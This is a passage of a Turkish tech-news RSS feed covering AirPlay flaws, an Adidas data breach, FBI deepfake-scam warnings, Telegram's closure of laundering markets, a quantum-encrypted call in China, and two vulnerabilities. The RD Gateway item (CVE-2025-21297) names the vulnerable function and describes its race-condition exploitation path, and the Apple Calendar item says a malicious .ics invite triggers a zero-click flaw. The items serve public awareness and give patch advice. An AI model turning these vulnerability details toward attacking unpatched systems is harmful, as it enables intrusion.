            <description><![CDATA[ Apple kullanıcılarını ilgilendiren kritik bir güvenlik açığı tespit edildi. AirPlay özelliğinde ortaya çıkan açık, hackerların aynı Wi-Fi ağına bağlı cihazlara uzaktan erişmesine ve casusluk yapmasına olanak tanıyor. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202505/image_870x_682dce61cb9d8.webp" length="23140" type="image/webp"/>
            
            <pubDate>Wed, 21 May 2025 16:00:26 +0300</pubDate>
            <dc:creator>Nurullah Şeker</dc:creator>
            <media:keywords>AirPlay açığı nedir, hackerlar iPhone cihazlara nasıl sızıyor, CarPlay sistemleri de risk altında mı, kullanıcılar AirPlay&#039;i nasıl devre dışı bırakabilir</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p><br data-start="347" data-end="350"><strong data-start="350" data-end="411">Apple cihazlarındaki AirPlay özelliği tehlike mi saçıyor?</strong><br data-start="411" data-end="414">Apple'ın cihazlar arası medya paylaşımını kolaylaştıran AirPlay protokolü, siber güvenlik uzmanlarının gündeminde. Oligo adlı güvenlik firması, bu sistemde kritik güvenlik açıkları tespit etti.</p>
<p></p>
<p data-start="611" data-end="949"><strong data-start="611" data-end="636">AirBorne açığı nedir?</strong><br data-start="636" data-end="639">Yapılan araştırmada, 'AirBorne' adı verilen bu açıkların hem Apple’ın AirPlay sisteminde hem de üçüncü taraf cihazların AirPlay uyumlu hale gelmesini sağlayan yazılım geliştirme kitinde (SDK) yer aldığı belirtildi. Söz konusu açıklar, hackerların aynı Wi-Fi ağına bağlı cihazlara uzaktan erişmesini sağlıyor.</p>
<p data-start="951" data-end="1235"><strong data-start="951" data-end="996">Test saldırısı: Hoparlöre erişim sağlandı</strong><br data-start="996" data-end="999">Oligo araştırmacıları, AirPlay destekli bir Bose hoparlöre uzaktan erişim sağlayarak sistemdeki açıklardan nasıl yararlanılabileceğini gösterdi. Uzak kod yürütme (RCE) saldırısı ile hoparlörün ekranına 'AirBorne' logosu yerleştirildi.</p>
<p data-start="1237" data-end="1535"><strong data-start="1237" data-end="1294">Mikrofonlu cihazlar casusluk tehdidiyle karşı karşıya</strong><br data-start="1294" data-end="1297">Güvenlik firması, bu açıkların özellikle mikrofon bulunan cihazlarda casusluk amacıyla kullanılabileceğini belirtti. Oligo'nun CTO’su Gal Elbaz, Wired'a yaptığı açıklamada milyonlarca cihazın bu açıklardan etkilenebileceğini ifade etti.</p>
<p data-start="1537" data-end="1864"><strong data-start="1537" data-end="1568">Apple ve CarPlay açıklaması</strong><br data-start="1568" data-end="1571">Apple ise yaptığı açıklamada, söz konusu güvenlik zafiyetlerinin etkisinin 'sınırlı' olduğunu savundu. Ancak araştırmacılar, benzer risklerin CarPlay destekli sistemlerde de bulunduğunu, özellikle tahmin edilebilir ya da bilinen Wi-Fi şifreleri kullanıldığında tehlikenin arttığını bildirdi.</p>
<p data-start="1866" data-end="2079"><strong data-start="1866" data-end="1918">Kullanıcılara öneri: Özelliği devre dışı bırakın</strong><br data-start="1918" data-end="1921">Uzmanlar, AirPlay özelliğini kullanmayan kullanıcıların güvenlik riski yaşamamak adına bu özelliği cihaz ayarlarından devre dışı bırakmasını tavsiye ediyor.</p>
<p data-start="2081" data-end="2253"><strong data-start="2081" data-end="2093"></strong></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Adidas Türkiye'deki Müşterilerinin Kişisel Verilerinin Çalındığını Açıkladı</title>
            <link>https://cumha.com.tr/adidas-turkiyedeki-musterilerinin-kisisel-verilerinin-calindigini-acikladi</link>
            <guid>https://cumha.com.tr/adidas-turkiyedeki-musterilerinin-kisisel-verilerinin-calindigini-acikladi</guid>
            <description><![CDATA[ Adidas, Türkiye&#039;deki bazı müşterilerinin kişisel verilerinin çalındığını ve güvenlik ihlali yaşandığını açıkladı. Şirket, kredi kartı bilgileri gibi finansal verilerin güvende olduğunu belirtti ve kullanıcılarını potansiyel dolandırıcılıklara karşı uyardı. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202505/image_870x_682dade4e2109.webp" length="48202" type="image/webp"/>
            
            <pubDate>Wed, 21 May 2025 13:41:52 +0300</pubDate>
            <dc:creator>Burak Ege Yilmaz</dc:creator>
            <media:keywords>Adidas&#039;ın Türkiye&#039;deki veri ihlali ne zaman meydana geldi, Adidas hangi verilerin sızdırıldığını açıkladı, Adidas müşterileri hangi konuda uyarıldı, Sızdırılan verilere dair başka hangi güvenlik önlemleri alındı?</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p><br data-start="372" data-end="375"><strong data-start="375" data-end="445">Adidas Türkiye'deki Müşterilerinin Verilerinin Çalındığını Duyurdu</strong><br data-start="445" data-end="448">Spor giyim markası Adidas, Türkiye'deki bazı müşterilerinin kişisel verilerinin sızdırıldığını açıkladı. Şirket, müşterilerine gönderdiği e-posta ile veri ihlali nedeniyle özür diledi ve kullanıcıları olası dolandırıcılıklara karşı uyardı.<br data-start="687" data-end="690"><strong data-start="690" data-end="719">Sızdırılan Veriler Neler?</strong><br data-start="719" data-end="722">Adidas'tan gelen açıklamaya göre, hackerlar, müşteri hizmetleriyle iletişime geçmiş bazı kullanıcıların kişisel bilgilerine erişim sağladı. Sızdırılan bilgiler arasında isim, e-posta adresi, telefon numarası, cinsiyet ve doğum tarihi bulunuyor. Ancak kredi kartı bilgileri ve kullanıcı şifrelerinin güvende olduğu bildirildi.<br data-start="1047" data-end="1050"><strong data-start="1050" data-end="1083">Adidas'tan Güvenlik Önlemleri</strong><br data-start="1083" data-end="1086">Adidas, veri ihlalinin ardından acil güvenlik önlemleri aldığını belirtti. Şirket, müşteri hesapları için parolaların sıfırlanması ve ek güvenlik önlemleri alındığını duyurdu. Ayrıca, kullanıcıları şüpheli mesajlara karşı dikkatli olmaları konusunda uyardı.<br data-start="1343" data-end="1346"><strong data-start="1346" data-end="1398">Müşterilere Uyarı: Şüpheli Mesajlara Dikkat Edin</strong><br data-start="1398" data-end="1401">Adidas, verilerin sızdırıldığına dair bir şüpheli faaliyet tespit edilmediğini ancak yine de kullanıcıların dikkatli olmaları gerektiğini vurguladı. Şirket, kullanıcıların hiçbir zaman kredi kartı bilgilerini veya şifrelerini paylaşmamaları gerektiğini hatırlattı.</p>
<p></p>
<p data-start="1667" data-end="1892" class=""></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Yapay zeka ile yapılan dolandırıcılıklarda yeni dönem: FBI'dan deepfake uyarısı</title>
            <link>https://cumha.com.tr/yapay-zeka-ile-yapilan-dolandiriciliklarda-yeni-doenem-fbidan-deepfake-uyarisi</link>
            <guid>https://cumha.com.tr/yapay-zeka-ile-yapilan-dolandiriciliklarda-yeni-doenem-fbidan-deepfake-uyarisi</guid>
            <description><![CDATA[ FBI, üretken yapay zeka ve deepfake teknolojilerini kullanarak üst düzey devlet yetkililerini taklit eden dolandırıcılara karşı vatandaşları uyardı. Smishing ve vishing saldırılarıyla hassas veriler hedef alınıyor. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202505/image_870x_682d8b6670cff.webp" length="33590" type="image/webp"/>
            
            <pubDate>Wed, 21 May 2025 13:10:51 +0300</pubDate>
            <dc:creator>Nurullah Şeker</dc:creator>
            <media:keywords>FBI neden deepfake ve yapay zekaya karşı uyarıda bulundu, smishing ve vishing nedir, bu saldırılar kimleri hedef alıyor, vatandaşlar bu tehditlere karşı nasıl önlem almalı</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p><br data-start="346" data-end="349"><strong data-start="349" data-end="421">FBI'dan ABD vatandaşlarına yapay zekâ tabanlı dolandırıcılık uyarısı</strong><br data-start="421" data-end="424">Amerika Birleşik Devletleri Federal Soruşturma Bürosu (FBI), yayınladığı yeni bir kamu duyurusunda, üretken yapay zeka (GenAI) ve deepfake teknolojileri kullanılarak gerçekleştirilen kimlik avı saldırılarına karşı vatandaşları dikkatli olmaya çağırdı.</p>
<p></p>
<p data-start="677" data-end="1044"><strong data-start="677" data-end="717">Üst düzey yetkililer taklit ediliyor</strong><br data-start="717" data-end="720">Duyuruda, siber suçluların hem federal hem de eyalet düzeyindeki mevcut ya da eski üst düzey hükümet yetkililerini veya onların yakın çevresini taklit ettiği belirtildi. Bu kişilerin adları ve görselleri, güvenilirlik hissi yaratmak amacıyla deepfake ve GenAI teknolojileriyle sahte sesli ve yazılı mesajlara dönüştürülüyor.</p>
<p data-start="1046" data-end="1413"><strong data-start="1046" data-end="1090">Smishing ve vishing saldırılarında artış</strong><br data-start="1090" data-end="1093">FBI, dolandırıcıların smishing (SMS ile kimlik avı) ve vishing (sesli kimlik avı) yöntemleriyle insanları hedef aldığına dikkat çekti. Bu tür saldırıların amacı, kullanıcıları ikincil bir mesajlaşma platformuna yönlendirerek kötü amaçlı yazılım bulaştırmak ya da değerli kişisel bilgileri ele geçirmek olarak tanımlandı.</p>
<p data-start="1415" data-end="1746"><strong data-start="1415" data-end="1450">Vatandaşlara güvenlik önerileri</strong><br data-start="1450" data-end="1453">FBI, dolandırıcılık girişimlerine karşı vatandaşlara çeşitli güvenlik önerilerinde bulundu. Bu kapsamda, özellikle üst düzey bir kişiden geldiği iddia edilen mesajların gerçekliğinin sorgulanması, sesli mesajların tonlama ve kelime seçimi açısından dikkatlice incelenmesi gerektiği vurgulandı.</p>
<p data-start="1748" data-end="2075"><strong data-start="1748" data-end="1775">Ünlü isimler de hedefte</strong><br data-start="1775" data-end="1778">Uyarıda, Elon Musk gibi kamuoyunda tanınan isimlerin de bu tür sahte içeriklerde sıkça kullanıldığı ifade edildi. Yapay zeka tabanlı teknolojilerin yaygınlaşması, dolandırıcıların ikna edici içerikler üretmesini kolaylaştırırken, kullanıcıların bu konuda daha bilinçli olması gerektiği belirtildi.</p>
<p data-start="2077" data-end="2265"><strong data-start="2077" data-end="2089"></strong></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>FBI'dan Deepfake ve Yapay Zeka Alarmı: Üst Düzey Yetkilileri Taklit Eden Yeni Dolandırıcılık Dalgası</title>
            <link>https://cumha.com.tr/fbidan-deepfake-ve-yapay-zeka-alarmi-ust-duzey-yetkilileri-taklit-eden-yeni-dolandiricilik-dalgasi</link>
            <guid>https://cumha.com.tr/fbidan-deepfake-ve-yapay-zeka-alarmi-ust-duzey-yetkilileri-taklit-eden-yeni-dolandiricilik-dalgasi</guid>
            <description><![CDATA[ ABD Federal Soruşturma Bürosu (FBI), deepfake ve üretken yapay zeka teknolojileriyle üst düzey devlet yetkililerini taklit eden dolandırıcıların yeni kimlik avı saldırıları düzenlediğini belirterek vatandaşları uyardı. FBI, smishing ve vishing saldırılarında artış yaşandığını ve bu yöntemlerle hassas bilgilerin hedef alındığını vurguladı. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202505/image_870x_682d79fac471b.webp" length="59704" type="image/webp"/>
            
            <pubDate>Wed, 21 May 2025 13:00:10 +0300</pubDate>
            <dc:creator>Nurullah Şeker</dc:creator>
            <media:keywords>FBI hangi teknolojilere karşı uyarıda bulundu, smishing ve vishing saldırıları nasıl yapılıyor, deepfake mesajlar nasıl ayırt edilir, dolandırıcıların asıl hedefi nedir</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p><br data-start="485" data-end="488"><strong data-start="488" data-end="535">FBI, sahte yetkili mesajlarına karşı uyardı</strong><br data-start="535" data-end="538">Amerika Birleşik Devletleri Federal Soruşturma Bürosu (FBI), yeni yayımladığı bir kamu duyurusuyla vatandaşları devam eden bir kimlik avı kampanyasına karşı dikkatli olmaya çağırdı. Yapılan açıklamada, tehdit aktörlerinin üretken yapay zeka (GenAI) ve deepfake teknolojilerini kullanarak üst düzey ABD federal ve eyalet hükümet yetkililerini taklit ettiği belirtildi.</p>
<p></p>
<p data-start="909" data-end="1247"><strong data-start="909" data-end="952">Smishing ve vishing saldırıları artışta</strong><br data-start="952" data-end="955">Söz konusu saldırılarda, SMS (smishing) ve sesli arama (vishing) yoluyla kullanıcıların güvenini kazanarak hassas verileri ele geçirmeye çalışıldığı bildirildi. FBI, bu yöntemlerin özellikle insanların duygularını hedef alarak hızlı ve düşünmeden karar vermelerine neden olduğunu vurguladı.</p>
<p data-start="1249" data-end="1533"><strong data-start="1249" data-end="1283">Sesli mesajlar tehlike taşıyor</strong><br data-start="1283" data-end="1286">FBI, tehdit aktörlerinin özellikle güvenilir ses ve metin mesajları oluşturmak için yapay zeka ve deepfake teknolojilerinden faydalandığını, çoğu durumda mevcut ve eski üst düzey yetkililer veya onların bağlantılarının taklit edildiğini aktardı.</p>
<p data-start="1535" data-end="1887"><strong data-start="1535" data-end="1561">Güvenlik için öneriler</strong><br data-start="1561" data-end="1564">FBI açıklamasında, "Üst düzey bir ABD yetkilisinden geldiğini iddia eden bir mesaj alırsanız, bunun gerçek olduğunu varsaymayın." uyarısında bulundu. Ayrıca kimlik doğrulaması yapılmadan mesajlara itibar edilmemesi gerektiği, ses tonu ve kelime seçimlerindeki tutarsızlıkların dikkatle incelenmesi gerektiği ifade edildi.</p>
<p data-start="1889" data-end="2126"><strong data-start="1889" data-end="1911">Ünlüler de hedefte</strong><br data-start="1911" data-end="1914">Üretken yapay zeka ve deepfake teknolojilerinin yaygınlaşmasıyla birlikte dolandırıcılık olaylarının arttığına dikkat çekilirken, Elon Musk gibi kamuya mal olmuş kişilerin dahi sıkça taklit edildiği belirtildi.</p>
<p data-start="2128" data-end="2311"></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Telegram, Çin merkezli 35 milyar dolarlık kara para ağına darbe vurdu</title>
            <link>https://cumha.com.tr/telegram-cin-merkezli-35-milyar-dolarlik-kara-para-agina-darbe-vurdu</link>
            <guid>https://cumha.com.tr/telegram-cin-merkezli-35-milyar-dolarlik-kara-para-agina-darbe-vurdu</guid>
            <description><![CDATA[ Telegram, 2021&#039;den bu yana faaliyet gösteren ve dünya genelinde siber suçlulara hizmet sunduğu belirtilen iki yasa dışı pazar yerini kapattı. Huione ve Xinbi Guarantee&#039;nin çökertilmesiyle birlikte, toplamda 35 milyar dolarlık kara para trafiği engellendi. ABD Hazine Bakanlığı&#039;nın da radarında olan şirketin Kuzey Kore bağlantılı işlemleri dikkat çekiyor. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202505/image_870x_682d794ea8428.webp" length="21674" type="image/webp"/>
            
            <pubDate>Wed, 21 May 2025 12:40:51 +0300</pubDate>
            <dc:creator>Nurullah Şeker</dc:creator>
            <media:keywords>Telegram hangi yasa dışı pazarları kapattı, Huione Group neden suçlanıyor, ABD Hazine Bakanlığı Huione ile ilgili hangi adımları attı, Telegram sözcüsü bu operasyonla ilgili ne dedi</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p><br data-start="477" data-end="480"><strong data-start="480" data-end="521">Telegram, yasa dışı pazarları kapattı</strong><br data-start="521" data-end="524">Popüler mesajlaşma uygulaması Telegram, çevrimiçi suçlarla mücadele kapsamında iki büyük yasa dışı platformu devre dışı bıraktı. Çin merkezli Xinbi Guarantee ve Huione Guarantee isimli bu pazar yerlerinin 2021’den bu yana faaliyet gösterdiği ve toplamda 35 milyar doları aşan bir işlem hacmine ulaştığı belirtildi.</p>
<p></p>
<p data-start="840" data-end="1182"><strong data-start="840" data-end="879">Siber suçlulara hizmet sunuyorlardı</strong><br data-start="879" data-end="882">Söz konusu platformların çalınan verilerin paylaşımı, kara para aklama hizmetleri ve telekomünikasyon altyapısı temini gibi yasa dışı faaliyetlerde kullanıldığı açıklandı. Blockchain analiz şirketi Elliptic’e göre bu operasyon, çevrimiçi dolandırıcılık faaliyetlerini önemli ölçüde sekteye uğratacak.</p>
<p data-start="1184" data-end="1588"><strong data-start="1184" data-end="1218">ABD, Huione Group'u hedef aldı</strong><br data-start="1218" data-end="1221">Huione Guarantee platformunun sahibi olan Huione Group, ABD Hazine Bakanlığı tarafından suç örgütlerine destek vermekle suçlandı. Şirketin, Kuzey Kore’nin siber soygunlarından 37 milyon dolar, dolandırıcılık olarak bilinen ‘domuz kesimi’ yönteminden ise 36 milyon doları akladığı öne sürüldü. Bu gelişmelerin ardından şirketin ABD finans sistemine erişimi engellendi.</p>
<p data-start="1590" data-end="1993"><strong data-start="1590" data-end="1623">Telegram sözcüsünden açıklama</strong><br data-start="1623" data-end="1626">Kapatılan hesaplar ve yasaklanan platformlar hakkında konuşan bir Telegram sözcüsü, Reuters’a yaptığı açıklamada ‘Dolandırıcılık veya kara para aklama gibi suç faaliyetlerinin hizmet şartları tarafından yasaklandığını ve keşfedildiğinde her zaman kaldırıldığını’ ifade etti. Telegram daha önce de binlerce kripto para dolandırıcılığı hesabını platformdan kaldırmıştı.</p>
<p data-start="1995" data-end="2195"><strong data-start="1995" data-end="2007"></strong></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Çin'den siber güvenlikte tarihi adım: Kuantum şifreli ilk telefon görüşmesi başarıyla yapıldı</title>
            <link>https://cumha.com.tr/cinden-siber-guvenlikte-tarihi-adim-kuantum-sifreli-ilk-telefon-goerusmesi-basariyla-yapildi</link>
            <guid>https://cumha.com.tr/cinden-siber-guvenlikte-tarihi-adim-kuantum-sifreli-ilk-telefon-goerusmesi-basariyla-yapildi</guid>
            <description><![CDATA[ China Telecom Quantum Group, kuantum anahtar dağıtımı ve kuantum sonrası kriptografiyi birleştiren dünyanın ilk ticari kuantum kriptografi sistemini faaliyete geçirdi. Pekin ile Hefei arasında kuantum şifreli ilk telefon görüşmesi yapıldı. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202505/image_870x_682d777a428cc.webp" length="39108" type="image/webp"/>
            
            <pubDate>Wed, 21 May 2025 11:35:06 +0300</pubDate>
            <dc:creator>Nurullah Şeker</dc:creator>
            <media:keywords>Kuantum kriptografi sistemi nasıl çalışıyor, Çin ilk kuantum şifreli görüşmeyi nerede yaptı, QKD ve PQC nedir, China Telecom hangi yeni kuantum ürünlerini tanıttı</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p><br data-start="389" data-end="392"><strong data-start="392" data-end="465">Çin, kuantum kriptografi alanında yeni bir dönemin kapılarını araladı</strong><br data-start="465" data-end="468">Çin merkezli devlet şirketi China Telecom Quantum Group, dünyanın ilk ticari kuantum kriptografi sistemini kullanıma sundu. Şirket, bu sistemle Pekin ve Hefei şehirleri arasında 1.000 kilometreden uzun bir mesafede kuantum şifreli ilk bölgeler arası telefon görüşmesini başarıyla gerçekleştirdi.</p>
<p></p>
<p data-start="767" data-end="1115"><strong data-start="767" data-end="827">Kuantum teknolojilerinin siber güvenlikteki rolü artıyor</strong><br data-start="827" data-end="830">Kuantum bilişimdeki hızlı ilerleme, klasik şifreleme sistemlerinin güvenliğini tehdit ediyor. Yeni geliştirilen kuantum kriptografi sistemi, özellikle güçlü kuantum bilgisayarların ileride oluşturabileceği şifre kırma tehditlerine karşı veri güvenliğini sağlamak amacıyla tasarlandı.</p>
<p data-start="1117" data-end="1544"><strong data-start="1117" data-end="1167">QKD ve PQC teknolojileri tek sistemde birleşti</strong><br data-start="1167" data-end="1170">Yeni sistem, Kuantum Anahtar Dağıtımı (QKD) ve Kuantum Sonrası Kriptografi (PQC) teknolojilerini bir araya getirerek siber güvenlikte çığır açıyor. QKD, şifreleme anahtarlarını fiziksel kuantum prensiplerine dayalı olarak güvenli biçimde iletirken; PQC, geleneksel algoritmaların kuantum bilgisayarlarca kırılmasını önlemek için gelişmiş matematiksel yöntemler kullanıyor.</p>
<p data-start="1546" data-end="1988"><strong data-start="1546" data-end="1604">China Telecom’dan iki yeni kuantum güvenlik ürünü daha</strong><br data-start="1604" data-end="1607">China Telecom, kuantum şifreli telefon sistemine ek olarak iki yeni ürün tanıttı. Bunlardan ilki, kuantum güvenli taşıyıcı sınıfı anlık mesajlaşma platformu olan <em data-start="1769" data-end="1785">Quantum Secret</em>; diğeri ise finansal denetim ve iş akış yönetimi için geliştirilen <em data-start="1853" data-end="1873">Quantum Cloud Seal</em> platformu oldu. Her iki ürün de Çin’in kuantum teknolojileri konusundaki stratejik kararlılığını ortaya koyuyor.</p>
<p data-start="1990" data-end="2171"><strong data-start="1990" data-end="2002"></strong></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Siber güvenlik uzmanı Ebubekir Bastama: 'RD Gateway açığı saldırganlara tam erişim izni verebilir'</title>
            <link>https://cumha.com.tr/siber-guvenlik-uzmani-ebubekir-bastama-rd-gateway-acigi-saldirganlara-tam-erisim-izni-verebilir</link>
            <guid>https://cumha.com.tr/siber-guvenlik-uzmani-ebubekir-bastama-rd-gateway-acigi-saldirganlara-tam-erisim-izni-verebilir</guid>
            <description><![CDATA[ CVE-2025-21297 kodlu kritik güvenlik açığı, Windows Server sistemlerinde kullanılan RD Gateway bileşenini hedef alıyor. Siber güvenlik araştırmacısı Ebubekir Bastama, açığın başarılı bir şekilde kullanılması halinde &#039;saldırganların sistem üzerinde tam kontrol elde edebileceğini&#039; belirtti. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202505/image_870x_682b235ad4d70.webp" length="60696" type="image/webp"/>
            
            <pubDate>Mon, 19 May 2025 15:26:28 +0300</pubDate>
            <dc:creator>CUMHA Haber Merkezi</dc:creator>
            <media:keywords></media:keywords>

                            <content:encoded>
                                            <![CDATA[<p data-start="543" data-end="1015" class=""><strong data-start="564" data-end="615">Microsoft’un RD Gateway bileşeninde kritik açık</strong><br data-start="615" data-end="618">Microsoft’un uzak masaüstü erişim servisi olan Remote Desktop Gateway (RD Gateway), yeni keşfedilen CVE-2025-21297 kodlu güvenlik açığı nedeniyle ciddi bir tehdit altında. Güvenlik araştırmacıları tarafından tespit edilen bu açıklık, saldırganların sunucu başlatma sürecinde yaşanan bir yarış durumu (race condition) üzerinden sistem belleğini bozarak kötü amaçlı kod çalıştırmasına imkân veriyor.</p>
<p data-start="1017" data-end="1576" class=""><strong data-start="1017" data-end="1055">Teknik detaylar ve saldırı vektörü</strong><br data-start="1055" data-end="1058">Söz konusu açık, aaedge.dll bileşeninde yer alan <code data-start="1107" data-end="1148">CTsgMsgServer::GetCTsgMsgServerInstance</code> fonksiyonunda tespit edilen bir <em data-start="1181" data-end="1197">use-after-free</em> (UAF) hatasından kaynaklanıyor. RD Gateway başlatılırken birden fazla iş parçacığının (thread) eşzamanlı olarak bu fonksiyona erişmesi, senkronizasyon eksikliği nedeniyle <code data-start="1369" data-end="1388">m_pMsgSvrInstance</code> işaretçisinin hatalı biçimde yeniden yazılmasına yol açıyor. Bu durum bellek bozulmasına neden olurken, saldırganların bu süreci manipüle ederek uzaktan kod çalıştırmasını mümkün kılıyor.</p>
<p data-start="1578" data-end="2030" class=""><strong data-start="163" data-end="230">Ebubekir Bastama: 'Sunucu kontrolü saldırganın eline geçebilir'</strong><br data-start="230" data-end="233">Siber güvenlik araştırmacısı Ebubekir Bastama, söz konusu güvenlik açığının ciddiyetine dikkat çekerek şu ifadeleri kullandı:<br data-start="358" data-end="361">'Bu tür zafiyetlere hızlı müdahale edilmezse, özellikle büyük sistemlerde yıkıcı etkileri olabilir. CVE-2025-21297 gibi bir açık, istismar edildiğinde saldırgana RD Gateway sunucusu üzerinde tam yetki kazandırabilir. Kurumsal sistemler için ciddi bir tehlike söz konusu.</p>
<p data-start="2032" data-end="2394" class=""><strong data-start="2032" data-end="2072">Riskin boyutu ve etkilenen sistemler</strong><br data-start="2072" data-end="2075">Güvenlik açığı, CVSS puanı 8.1 ile 'yüksek' risk kategorisine alınmış durumda. Açığın istismarı, 9 adımlı heap çarpışmaları içeren karmaşık bir süreci gerektirse de, saldırının başarıya ulaşması durumunda RD Gateway sunucularının tüm kontrolü ele geçirilebiliyor. Açık, aşağıdaki Windows Server sürümlerini etkiliyor:</p>
<ul data-start="2395" data-end="2524">
<li data-start="2395" data-end="2418" class="">
<p data-start="2397" data-end="2418" class="">Windows Server 2016</p>
</li>
<li data-start="2419" data-end="2442" class="">
<p data-start="2421" data-end="2442" class="">Windows Server 2019</p>
</li>
<li data-start="2443" data-end="2466" class="">
<p data-start="2445" data-end="2466" class="">Windows Server 2022</p>
</li>
<li data-start="2467" data-end="2524" class="">
<p data-start="2469" data-end="2524" class="">Windows Server 2025<br data-start="2488" data-end="2491">(Core ve Standard yapıları dahil)</p>
</li>
</ul>
<p data-start="2526" data-end="2837" class=""><strong data-start="2526" data-end="2559">Kurumsal ağlar tehdit altında</strong><br data-start="2559" data-end="2562">RD Gateway, kurumsal ağlara güvenli uzak erişim sağlamak amacıyla kullanıldığından, bu zafiyet kritik öneme sahip. Açığın kötüye kullanılması durumunda, kurum ağına yetkisiz erişim sağlanabilir ve veri sızıntısı ya da sistem çökmesi gibi ciddi güvenlik ihlalleri yaşanabilir.</p>
<p data-start="2839" data-end="3055" class=""><strong data-start="2839" data-end="2880">Microsoft’tan güvenlik güncellemeleri</strong><br data-start="2880" data-end="2883">Microsoft, söz konusu güvenlik açığını gidermek üzere Mayıs 2025 itibarıyla çeşitli güvenlik güncellemeleri yayınladı. Etkilenen sistemler için ilgili yama kodları şöyle:</p>
<ul data-start="3056" data-end="3199">
<li data-start="3056" data-end="3091" class="">
<p data-start="3058" data-end="3091" class="">Windows Server 2016 → KB5050011</p>
</li>
<li data-start="3092" data-end="3127" class="">
<p data-start="3094" data-end="3127" class="">Windows Server 2019 → KB5050008</p>
</li>
<li data-start="3128" data-end="3163" class="">
<p data-start="3130" data-end="3163" class="">Windows Server 2022 → KB5049983</p>
</li>
<li data-start="3164" data-end="3199" class="">
<p data-start="3166" data-end="3199" class="">Windows Server 2025 → KB5050009</p>
</li>
</ul>
<p data-start="3201" data-end="3509" class=""><strong data-start="3201" data-end="3233">Kurumlara acil eylem çağrısı</strong><br data-start="3233" data-end="3236">Uzmanlar, kullanıcıların acilen ilgili yamaları uygulamasını ve RD Gateway sistemlerini sadece güvenilir IP adreslerine erişime açmasını tavsiye ediyor. Ayrıca, RD Gateway loglarının olağandışı aktiviteler açısından düzenli olarak gözden geçirilmesi gerektiği belirtiliyor.</p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Apple Takvim Uygulamasında Zero-Click Açığı: Hiç Tıklamadan Sistem Ele Geçirilebiliyor</title>
            <link>https://cumha.com.tr/apple-takvim-uygulamasinda-zero-click-acigi-hic-tiklamadan-sistem-ele-gecirilebiliyor</link>
            <guid>https://cumha.com.tr/apple-takvim-uygulamasinda-zero-click-acigi-hic-tiklamadan-sistem-ele-gecirilebiliyor</guid>
            <description><![CDATA[ Apple’ın macOS ve iOS sistemlerinde yer alan Takvim uygulamasında, kullanıcı etkileşimine gerek kalmadan sistem kontrolü sağlayan kritik bir güvenlik açığı keşfedildi. CVE-2022-46723 koduyla tanımlanan bu açık, zararlı takvim davetleri üzerinden çalışıyor ve siber güvenlik araştırmacısı Ebubekir Bastama’ya göre güncelleme yapılmamış cihazlarda halen aktif biçimde sömürülebiliyor. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202505/image_870x_682b006b75d04.webp" length="16948" type="image/webp"/>
            
            <pubDate>Mon, 19 May 2025 12:57:49 +0300</pubDate>
            <dc:creator>CUMHA Haber Merkezi</dc:creator>
            <media:keywords>Zero-click açığı nedir, CVE-2022-46723 hangi cihazları etkiliyor, Apple Takvim açığı nasıl çalışıyor, güncelleme yapılmazsa ne olur</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p data-start="507" data-end="919" class=""><strong data-start="528" data-end="597">Apple’ın Takvim uygulamasında kritik güvenlik açığı tespit edildi</strong><br data-start="597" data-end="600">CVE-2022-46723 koduyla kayda geçen güvenlik açığı, Apple’ın Takvim (Calendar) uygulamasında yer alıyor. Bu açık, saldırganların yalnızca zararlı bir takvim daveti göndererek hedef sistemde herhangi bir kullanıcı etkileşimine gerek kalmadan dosya yazmasına, silmesine ve tam sistem kontrolü elde etmesine olanak tanıyor.</p>
<p data-start="921" data-end="1323" class=""><strong data-start="921" data-end="957">Zero-Click özelliğiyle çalışıyor</strong><br data-start="957" data-end="960">Söz konusu açık, ‘zero-click’ olarak adlandırılan ve kullanıcıdan hiçbir etkileşim gerektirmeyen saldırı türlerinden biri. Zararlı .ics uzantılı bir takvim dosyasıyla bu açığın tetiklenebildiğini aktaran siber güvenlik araştırmacısı <strong data-start="1193" data-end="1213">Ebubekir Bastama</strong>, açığın çalışması için hedefin gelen takvim davetlerini otomatik kabul etmesinin yeterli olduğunu belirtiyor.</p>
<p data-start="1325" data-end="1640" class=""><strong data-start="1325" data-end="1359">Açık eski ancak hâlâ tehlikeli</strong><br data-start="1359" data-end="1362">Ebubekir Bastama’ya göre, her ne kadar bu açık 2022 yılında keşfedilip Apple tarafından düzeltme yayınlanmış olsa da, güncelleme yapılmamış bazı cihazlarda bu zafiyet aktif olarak sömürülebiliyor. Özellikle eski iOS ve macOS sürümlerini kullanan kullanıcılar ciddi risk altında.</p>
<p data-start="1642" data-end="1898" class=""><strong data-start="1642" data-end="1674">Hangi sistemler etkileniyor?</strong><br data-start="1674" data-end="1677">Bu güvenlik açığı, Apple’ın macOS ve iOS işletim sistemlerinde geçerli. Windows ve Android sistemlerde benzeri bir açık henüz tespit edilmedi. Otomatik takvim davetlerini kabul eden cihazlar ise özellikle hedef konumunda.</p>
